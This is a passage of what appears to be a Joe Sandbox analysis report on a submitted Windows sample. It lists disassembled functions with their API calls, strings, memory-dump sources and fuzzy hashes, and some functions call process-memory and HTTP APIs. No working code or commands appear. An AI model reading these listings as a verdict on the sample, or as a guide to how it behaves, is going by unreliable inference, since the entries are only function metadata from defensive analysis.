                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247068974-0
                                                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                        Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: )$U$\
                                                                                                        • API String ID: 0-3705770531
                                                                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                        Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                        • String ID: .lnk
                                                                                                        • API String ID: 886957087-24824748
                                                                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                        Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                        Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                        Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                        Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                        • API String ID: 708495834-557222456
                                                                                                        • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                        • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                        Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                        • String ID: @
                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                        Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \$]$h
                                                                                                        • API String ID: 4104443479-3262404753
                                                                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                        Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                        • String ID: <$@
                                                                                                        • API String ID: 2417854910-1426351568
                                                                                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                        Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3705125965-3916222277
                                                                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                        Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 135850232-4108050209
                                                                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                        Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Long
                                                                                                        • String ID: SysTreeView32
                                                                                                        • API String ID: 847901565-1698111956
                                                                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                        Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window
                                                                                                        • String ID: SysMonthCal32
                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
